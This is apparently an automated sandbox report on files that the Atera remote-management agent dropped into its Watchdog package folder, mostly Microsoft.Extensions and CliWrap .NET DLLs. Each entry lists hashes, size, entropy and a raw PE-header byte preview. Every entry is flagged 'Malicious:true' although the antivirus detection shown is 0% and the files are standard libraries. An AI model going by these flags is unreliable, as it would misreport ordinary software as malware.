                                                                                                                                                                                                                                                                                                                                  SSDEEP:768:SO4QNCMhTIDWo+hDbEicjIeoCtU1a1ZTG/2u2Xv2vFbanu5jEpYi60ItX:MQTIywi3eobgTG/2u2/wb0u5c76dX
                                                                                                                                                                                                                                                                                                                                  MD5:3F4B8203C5CBC904B4A8763DA3CEBC72
                                                                                                                                                                                                                                                                                                                                  SHA1:69548F86D313F1530DA7195402593B5B05A6F1DD
                                                                                                                                                                                                                                                                                                                                  SHA-256:7E3E1E3B0D3007CB4058F14D039D670B024ABF2FCCC748411A8756DD586F7A8E
                                                                                                                                                                                                                                                                                                                                  SHA-512:C82747411384F88F8D2AA0E51CBFA23786C073F83931716638B8D6E370A0123471E82EF4A6EEA23A52C3AC28B741DF95EED4E7CA28075EA30E44ED54D6E0B8F9
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...|.t..........." ..0.................. ........... .......................@............`.....................................O.......................P(... ..........T............................................ ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc....... ......................@..B........................H........_...............................................................(....*^.(.......J...%...}....*:.(......}....*:.(......}....*...0..T........(....(....,..(...+&.(...+&.(...+&(....,..(...+&.(...+&(....,..(...+&.(...+&.(...+&*.0...........(....&.(...+&.(...+&.(...+&.(...+&.(...+&.(...+&.(...+&.(...+&.(...+&.(...+&.(...+&.(...+&.(...+&.(...+&.(...+&.(...+&.(...+&.(...+&*".(...+&*".(...+&*".(...+&*.(....*.(....*..(....*j(.....%-.&~....(....o....*j(.....%-.&~....o ...(!...

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\CliWrap.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):186448
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.958017277458429
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3072:KhOh6zHpz7YSkfd6kUYm4wlb6QAGcbLQpgjOHopZb7UsUDfAbmn1F8mSowoT:KhJ177+9jQAVph4sUDfAbm1F8lG
                                                                                                                                                                                                                                                                                                                                  MD5:74C43B0E91A1B1CFF24CF98CE3783677
                                                                                                                                                                                                                                                                                                                                  SHA1:E7DA6F0D1F57F3E73835E67C8A602F9858263EEA
                                                                                                                                                                                                                                                                                                                                  SHA-256:B287B1909651387D07C06C881AC6DECEEA13000897AF269647E97D810278A881
                                                                                                                                                                                                                                                                                                                                  SHA-512:AE14518570E7F1A17D287010A8F696D7634EDBD5B344CC77BF55D378319EA8C5666FCE8743538149C7A4F84010D31E4899D3A0F033FC1FA6FFBA8CE451C01BC0
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................." ..0.............:.... ........... ....................... ......H.....`.....................................O.......$...............P(..............p............................................ ............... ..H............text...@.... ...................... ..`.rsrc...$...........................@..@.reloc..............................@..B........................H.......0.................................................................(9...*^.(9..........%...}....*:.(9.....}....*:.(9.....}....*:.(9.....}....*....0..G.........(:...}q......}r......}s......}t......}p.....|q.....(...+..|q...(<...*..0..G.........(:...}x......}y......}z......}{......}w.....|x.....(...+..|x...(<...*..0..G.........(=...}c......}d......}e......}f......}b.....|c.....(...+..|c...(?...*..0..G.........(=...}k......}l......}m......}n......}j.....|k.....(...+..|k..

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Configuration.Abstractions.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):29264
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.523133869724914
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:n+q+2Vv/+usFlLVyKo/9ETG/DwzzRjz69M1ZVMdWs6NWskgNyb8E9VF6IYijSJI1:n+EF/CvyKohrqn3EpYi60NP
                                                                                                                                                                                                                                                                                                                                  MD5:0A0AF8B9C249F09A343637F326FB3F16
                                                                                                                                                                                                                                                                                                                                  SHA1:2676A8ECAE75F9C688DBB4D7A3A58FBE317FF036
                                                                                                                                                                                                                                                                                                                                  SHA-256:17CC107993EFD8B812FC9A1F8541F472EC7323DDB0F0C5BBA05A0E7B9E039EFF
                                                                                                                                                                                                                                                                                                                                  SHA-512:78E3A2E6D4179D857AC4E923116BE6EE759B171B55711A9BE83AD5C851DBA5F0706012E2775F8946EB498D259FF83BB3D4CB5553650AF5029801A1D427CFB74B
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...N............." ..0..>...........\... ...`....... ..............................|.....`.................................{\..O....`...............J..P(..........d[..T............................................ ............... ..H............text....<... ...>.................. ..`.rsrc........`.......@..............@..@.reloc...............H..............@..B.................\......H........(...............W..X....Z........................................(&...*^.(&......8...%...}....*:.(&.....}....*:.(&.....}....*:.(&.....}....*:.(&.....}....**.-..(....*..s'...z.~....*...0..........(....,..*..(.....o(......&...*...................0...........(.......()...-..,..*.*.(....,.r...p......%...%...(*...*..(+...*.(....,.r...p......%...%...%...(*...*...(,...*.(....,!r...p......%...%...%...%...(*...*....(-...*..,&(....,..r...pr...p.(*...(....*..(/...*.*.(....,.r..

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Configuration.Binder.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):42576
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.406276432201498
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:768:vThLeDjUB16TI1CQ12cMcFgL/l5dgEpYi60I:vTvB71dEcME45dp761
                                                                                                                                                                                                                                                                                                                                  MD5:5240B7756AE77FFDA964F99E6BCF3DB9
                                                                                                                                                                                                                                                                                                                                  SHA1:F7AF3AC3E97426C23B134ADA22527EE18932C4E2
                                                                                                                                                                                                                                                                                                                                  SHA-256:6DD93B898FE0DC2133B9BB516063256409639D7864B617B7B87F9A747559BC46
                                                                                                                                                                                                                                                                                                                                  SHA-512:69760B00719EA26D2E0C25A5A11F23FDE8B38B4D648D85325190A4C6A6BC81A5A69A3D00EDA78D58D506C8911B5E3DB593E128C3FFFAE4463DCB4D6D582CF435
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...f............" ..0..t.............. ........... ...................................`.....................................O....................~..P(..........|...T............................................ ............... ..H............text....s... ...t.................. ..`.rsrc................v..............@..@.reloc...............|..............@..B........................H.......4:...L.............8.............................................(....*^.(.......A...%...}....*:.(......}....*:.(......}....*:.(......}....*:.(......}....**.-..(....*..s....z.~....*...0..........(....,..*..(.....o.......&...*...................0...........(.......(....-..,..*.*.(....,.r...p......%...%...( ...*..(!...*.(....,.r...p......%...%...%...( ...*...("...*.(....,!r...p......%...%...%...%...( ...*....(#...*..,&(....,..r...pr...p.( ...($...*..(%...*.*.(....,.r..

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Configuration.CommandLine.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):25168
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.66969016312103
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:AYEMITBweJkneGO3WKGW9anWsxNyb8E9VF6IYijSJIVxOSh2CQ:GTBwa7dEtVEpYi60+CQ
                                                                                                                                                                                                                                                                                                                                  MD5:5C156BB2C894165B9FAB27D0ABBE4611
                                                                                                                                                                                                                                                                                                                                  SHA1:2004F377D72FE1F131B5FEC6FFC20B028162A34B
                                                                                                                                                                                                                                                                                                                                  SHA-256:5A2E267775D8146C2F3DC3A5DF74753CA52172AC4F5FC319234BB42BF97E11B7
                                                                                                                                                                                                                                                                                                                                  SHA-512:BB5E1A0E8088B87C635275A62A31DFCC97F899AAC175A83A994D222B79CFE37EEA4BD6F632AF10D3CD6471208756082543D9AA2B7A86530847996CE04D66884A
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....1............" ..0..0...........O... ...`....... ...............................U....`..................................O..O....`...............:..P(..........xN..T............................................ ............... ..H............text..../... ...0.................. ..`.rsrc........`.......2..............@..@.reloc...............8..............@..B.................O......H.......d&...#..........hI.......M........................................(....*^.(.......-...%...}....*:.(......}....*:.(......}....*:.(......}....*:.(......}....**.-..(....*..s....z.~....*...0..........(....,..*..(.....o.......&...*...................0...........(.......(....-..,..*.*.(....,.r...p......%...%...(....*..(....*.(....,.r...p......%...%...%...(....*...(....*.(....,!r...p......%...%...%...%...(....*....( ...*..,&(....,..r...pr...p.(....(!...*..("...*.*.(....,.r..

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Configuration.EnvironmentVariables.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):21584
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.715302117184057
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:46jxRm3soGTeZeszQm31WUKeWstNyb8E9VF6IYijSJIVxen7sYA:Xj23spTeZposJEpYi60+A
                                                                                                                                                                                                                                                                                                                                  MD5:1CCE7C95F9F4C3D365493C168700B16E
                                                                                                                                                                                                                                                                                                                                  SHA1:A2621BBC46E037EA15AF4BF7F75184B310193AAA
                                                                                                                                                                                                                                                                                                                                  SHA-256:45F886050A0CEF18098CE8A9B07922C63025938AA9FA09230EBCBEBFB9774FDF
                                                                                                                                                                                                                                                                                                                                  SHA-512:6E13DCA30B2F2ADB102B440D33DF9DE1BA0C043B96DD1FCABE53BF1D983853945291129FC69D3AD86270AE0AB5032BCFDF761779158E9D3C9E5808B874CDC3D7
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....s............" ..0.."..........NA... ...`....... ..............................9a....`..................................@..O....`...............,..P(...........?..T............................................ ............... ..H............text...T!... ...".................. ..`.rsrc........`.......$..............@..@.reloc...............*..............@..B................/A......H.......x#......................T?........................................(....*^.(.......$...%...}....*:.(......}....*:.(......}....*:.(......}....*:.(......}....*:.(......}....*..{....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*:.s....o....&.*V.s....%.o....o....&.*"..(...+*v.(.....~....}.....~....}....*..(......%-.&~....}......{....(....}....*2.(....(....*..(....o....r...p.{....r...p(....*..0..........(....s......o.....8.....o .......(!...t&.....o .

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Configuration.FileExtensions.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):28240
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.601922790426778
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:nzp434gr92+liFe/5XjtCZ0UaFoSc43IXABPpBzWq66WsdNyb8E9VF6IYijSJIVk:zxk1/9jtGhScRwPpByoZEpYi608LH
                                                                                                                                                                                                                                                                                                                                  MD5:3C24D1DE7E43DDC8C2B542AF65FB56D8
                                                                                                                                                                                                                                                                                                                                  SHA1:4693383CF7D38937059AD5126A1F26D7C0A1D792
                                                                                                                                                                                                                                                                                                                                  SHA-256:E30298D1F1D024C671CE3C59171128F61047BD33D48017C95C43A275AFCC255D
                                                                                                                                                                                                                                                                                                                                  SHA-512:7E498195D9B9A56C6A691D735DFC4F4B60D0DBD5343A080C69778475E7670A60EE313EC6A2A0B8516AEC9BCC4E1A9A1AC61878F0E6DCAC65191E3C6CA7B04133
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....."..........." ..0..<...........[... ...`....... ..............................qh....`..................................[..O....`...............F..P(..........tZ..T............................................ ............... ..H............text....;... ...<.................. ..`.rsrc........`.......>..............@..@.reloc...............D..............@..B.................[......H........(...,...........U..8....Y........................................(....*^.(.......3...%...}....*:.(......}....*:.(......}....*:.(......}....*:.(......}....**.-..(....*..s....z.~....*...0..........(....,..*..(.....o.......&...*...................0...........(.......(....-..,..*.*.(....,.r...p......%...%...(....*..(....*.(....,.r...p......%...%...%...(....*...( ...*.(....,!r...p......%...%...%...%...(....*....(!...*..,&(....,..r...pr...p.(....("...*..(#...*.*.(....,.r..

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Configuration.Json.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):27728
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.563596604110572
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:TXLAulT7JkcAoWovkT7jF6zOFz3Ge1l68mWka2WsGNyb8E9VF6IYijSJIVxltMsv:bLAux7yUcT7jF6aYhSkOEpYi60Tv
                                                                                                                                                                                                                                                                                                                                  MD5:891601A14B4EE9A715F84269B27E7792
                                                                                                                                                                                                                                                                                                                                  SHA1:5E701FCF30569478E5C021D85B11EF2B4DE3FFA3
                                                                                                                                                                                                                                                                                                                                  SHA-256:1252154F3DF81FB62E41F88A9E74FC821DEB8C89201BA2EA0DFB092FD29E49F4
                                                                                                                                                                                                                                                                                                                                  SHA-512:B23885D4F2A0188786FE24B12CBE75479E05E7621B8BB97619851941C2D61DCC0F3EE8365CACD1724ADF541C9DD3702F5D5F339300F5CDAA6DC6017E4A71F2E2
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................." ..0..:...........X... ...`....... ....................................`.................................SX..O....`..l............D..P(..........LW..T............................................ ............... ..H............text....8... ...:.................. ..`.rsrc...l....`.......<..............@..@.reloc...............B..............@..B.................X......H........(...)...........Q.......V........................................(....*^.(.......;...%...}....*:.(......}....*:.(......}....*:.(......}....*:.(......}....**.-..(....*..s....z.~....*...0..........(....,..*..(.....o.......&...*..............!....0...........(.......(....-..,..*.*.(....,.r...p......%...%...(....*..( ...*.(....,.r...p......%...%...%...(....*...(!...*.(....,!r...p......%...%...%...%...(....*....("...*..,&(....,..r...pr...p.(....(#...*..($...*.*.(....,.r..

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Configuration.UserSecrets.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):26192
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.5482914840531965
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:lMvnbB39p5YGTv9uuM1iFSF3yE1LlW9KCWsHNyb8E9VF6IYijSJIVxUDYT:lKnbPplTv9uuLuVwrEpYi60f
                                                                                                                                                                                                                                                                                                                                  MD5:B56153EAB3529AC17AAF6B12D8DDA185
                                                                                                                                                                                                                                                                                                                                  SHA1:15CE43D57DA47FE7B7CF2E56279EC589A097838A
                                                                                                                                                                                                                                                                                                                                  SHA-256:2055ED610FB4265A026ED5BF843B0E36D53FBAEB241F91902416AFF33E7D9F0C
                                                                                                                                                                                                                                                                                                                                  SHA-512:5E6BD75ED5D137210ABB60AD40D018D81500CABFF023F13FFD5F7036434B80896BCA4842676B1868C7B37C2832FC002E0BC239718D5DC6F4D3BD40B70CF6B900
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...,.<..........." ..0..4..........bR... ...`....... ....................................`..................................R..O....`...............>..P(...........P..T............................................ ............... ..H............text...h2... ...4.................. ..`.rsrc........`.......6..............@..@.reloc...............<..............@..B................AR......H........&..$$..........(J..P...xP........................................(....*^.(.......&...%...}....*:.(......}....*:.(......}....*:.(......}....*:.(......}....**.-..(....*..s....z.~....*...0..........(....,..*..(.....o.......&...*...................0...........(.......(....-..,..*.*.(....,.r...p......%...%...(....*..(....*.(....,.r...p......%...%...%...(....*...(....*.(....,!r...p......%...%...%...%...(....*....( ...*..,&(....,..r...pr...p.(....(!...*..("...*.*.(....,.r..

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Configuration.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):41040
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.409153821418013
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:768:9054t3ibki5TCk3jqEr0WBum6BEpYi60mAA:9PtnUj/Lkm976j5
                                                                                                                                                                                                                                                                                                                                  MD5:E8FC2876C108BFD3947ACDDAEDFE9FF6
                                                                                                                                                                                                                                                                                                                                  SHA1:49EA8F340CB26254D285C78D0D2445EF693929DC
                                                                                                                                                                                                                                                                                                                                  SHA-256:E0641208BABA8C9E0737CAE134C59E66C9A170D83BAB75E8CB22E0748C03CF8B
                                                                                                                                                                                                                                                                                                                                  SHA-512:1D29682BD7EEEA0DEFBEB8B1CD63E8CAD55A857EBE1A54A220D41EB301CD7719B2CC6D5899EABCEE54436DB92D54B96A0A57C45BACA5BB156478F27BDF4C9B23
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...mq..........." ..0..n............... ........... ..............................}.....`.................................a...O....................x..P(..........d...T............................................ ............... ..H............text....l... ...n.................. ..`.rsrc................p..............@..@.reloc...............v..............@..B........................H.......p8...M...........................................................(#...*^.(#......A...%...}....*:.(#.....}....*:.(#.....}....*:.(#.....}....*:.(#.....}....**.-..(....*..s$...z.~....*...0..........(....,..*..(.....o%......&...*...................0...........(.......(&...-..,..*.*.(....,.r...p......%...%...('...*..((...*.(....,.r...p......%...%...%...('...*...()...*.(....,!r...p......%...%...%...%...('...*....(*...*..,&(....,..r...pr...p.('...(+...*..(,...*.*.(....,.r..

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.DependencyInjection.Abstractions.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):45136
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.256231698179612
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:768:hq+RszBJV7CkN9YxrIvw2DLBjYAQP0+lyJ9PPYEpYi60sl/E:hq+SSkNNjdQc+cJNp76HlE
                                                                                                                                                                                                                                                                                                                                  MD5:98E626A565F85C42710AE0CDC81C6F53
                                                                                                                                                                                                                                                                                                                                  SHA1:B62F256FB1016407190707FA6276C182AD3054A7
                                                                                                                                                                                                                                                                                                                                  SHA-256:D242EDE9C4C6091A7531F7C177988CFD73E1D6BB524E393BA9677EE94C727E87
                                                                                                                                                                                                                                                                                                                                  SHA-512:9DEBFB87507046E57E12472EB1C960469B4A4B73D13A360EB23E147EE1EC9A79A9B2C8B5E16003DC1FC7E62B4BF7C3165A9437F3427092B7D0AAE94AB7F15F97
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....r=..........." ..0..|............... ........... ..............................R*....`....................................O.......................P(..............T............................................ ............... ..H............text....{... ...|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......<=...U..........P....... .........................................(!...*^.(!......E...%...}....*:.(!.....}....*:.(!.....}....*:.(!.....}....*:.(!.....}....**.-..(....*..s"...z.~....*...0..........(....,..*..(.....o#......&...*...................0...........(.......($...-..,..*.*.(....,.r...p......%...%...(%...*..(&...*.(....,.r...p......%...%...%...(%...*...('...*.(....,!r...p......%...%...%...%...(%...*....((...*..,&(....,..r...pr...p.(%...()...*..(*...*.*.(....,.r..

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.DependencyInjection.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):85072
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.265379758165329
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:1536:6NNgvCsvGPrpqSMo4Z9M4IIWSYe2Kbj5u6fjQ+7PMMcmnJf76hQG:6MCsvGPPed5ZfjQ+rBvJf2x
                                                                                                                                                                                                                                                                                                                                  MD5:C88A47F8B5C79A7A5999A305D80F782A
                                                                                                                                                                                                                                                                                                                                  SHA1:81720478D7ADC0D92F01E23192E14E9F0F80B232
                                                                                                                                                                                                                                                                                                                                  SHA-256:B65E0315311188BB0C3A6D39BF33CF67B9A2694A7529A6045958497EBBBB8181
                                                                                                                                                                                                                                                                                                                                  SHA-512:A3F3FA947A9FC62802773E1B7D0001B07F98E3AE2A5C8B65792A824D291090038FC373EDDAA77D163FE90EB37871975E9DD6C3A3272D59CFBBBB603E47FB64DB
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...R.)..........." ..0.............28... ...@....... ....................................`..................................7..O....@...............$..P(...`.......6..T............................................ ............... ..H............text...8.... ...................... ..`.rsrc........@......................@..@.reloc.......`......."..............@..B.................8......H.......lj..............$%..0...T6........................................(&...*^.(&......s...%...}....*:.(&.....}....*:.(&.....}....*:.(&.....}....*:.(&.....}....*.~....*..0..........(....,..*..(.....o'......&...*...................0...........(.......((...-..,..*.*.(....,.r...p......%...%...()...*..(*...*.(....,.r...p......%...%...%...()...*...(+...*.(....,!r...p......%...%...%...%...()...*....(,...*..,&(....,..r...pr...p.()...(-...*..(....*.*.(....,.r...p......%...%...()..

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.FileProviders.Abstractions.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):23632
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.614331768655404
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:vVAko1Z0S/oj6ETt9EQMVSz3PMA2oWs6hWs6SNyb8E9VF6IYijSJIVxqJpRt:v3m0SM3Tt90Pl73EpYi60aF
                                                                                                                                                                                                                                                                                                                                  MD5:E8600BB295D6902C6718BBBBE304425B
                                                                                                                                                                                                                                                                                                                                  SHA1:E06DB6AED1DA711F88B3A7A862B27143BF1E2DA3
                                                                                                                                                                                                                                                                                                                                  SHA-256:97AFE2EE2BB4F9798E8BE3A9D86813EC77D8A7E0EAB450803B7C95A2E0B1B3EE
